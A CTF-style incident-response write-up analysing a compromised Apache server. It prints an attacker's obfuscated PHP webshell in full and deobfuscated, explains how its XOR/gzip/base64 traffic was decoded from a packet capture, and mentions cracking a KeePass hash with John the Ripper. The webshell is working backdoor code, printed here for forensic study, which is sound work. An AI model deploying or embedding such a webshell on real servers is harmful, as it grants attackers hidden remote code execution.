We covered an incident response scenario that involved using forensics skills to investigate a webserver hacked by exploiting a file upload vulnerability, We have been given the webshell the attacker used along with a packet dump file that included the packets exchanged between the attacker and the webserver while they were executing commands.

We decoded the script using base64, XOR encryption and Gzip compression to uncover the commands the attacker executed along with the output received.

We found that the attacker downloaded a Keepass file encoded with base64 so we used keepass2john to extract the hash and john the ripper to find the password of the password database that contained the flag.

Get Computer Forensics Notes

The Complete Practical Web Application Penetration Testing Course

Challenge Description

An attacker has found a vulnerability in our web server that allows arbitrary PHP file upload in our Apache server. Suchlike, the hacker has uploaded a what seems to be like an obfuscated shell (support.php). We monitor our network 24/7 and generate logs from tcpdump (we provided the log file for the period of two minutes before we terminated the HTTP service for investigation), however, we need your help in analyzing and identifying commands the attacker wrote to understand what was compromised.

Video Highlights

The obfuscated php webshell script is below

<?php$V='$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87Eu)JqEz6u)"u)u);function u)x($';$P='++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_u)match("/$kh(.u)+)$kf/",@u)u)file_u)getu)_cu)ontents(';$d='u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i=0u);u)$i<$l;){for(u)$j=0;(u)$u)j<$c&&$i<$l)u)u);$j++,$i';$B='ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)ncu)ode(@x(@gzu)compress(u)$o),u)$k));pru)u)int(u)"$p$kh$r$kf");}';$N=str_replace('FD','','FDcreFDateFD_fFDuncFDFDtion');$c='"php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)ncu)ompress(@x(@bau)se64_u)decodu)e($u)m[1]),$k))u));$u)ou)=@';$u=str_replace('u)','',$V.$d.$P.$c.$B);$x=$N('',$u);$x();?>

After deobfuscation it becomes

$k=”80e32263″;
$kh=”6f8af44abea0″;
$kf=”351039f4a7b5″;
$p=”0UlYyJHG87EJqEz6″;
function x($t,$k){
$c=strlen($k);
$l=strlen($t);
$o=””;
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++){
$o.=$t{$i}^$k{$j};
}
}
return $o;
}
if(@preg_match(“/$kh(.+)$kf/”,@file_get_contents(“php://input”),$m)==1){
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print(“$p$kh$r$kf”);
}

We can follow the reverse of the above process to decode the output received by the attacker (shown in the wireshark)

@gzuncompress(@x(@base64_decode($encoded),$k));

For example the output below is observed in the first Wireshark packet

0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5

If we strip the $p, $kh and $kf from it, we can end up with $r

QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy

The above corresponds to the below output (the output of id command)

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Video Walkthrough

About the Author

Cybersecurity Trainer MS in Cybersecurity Expertise in Healthcare and Finance Industries Penetration tester and compliance auditor

View Articles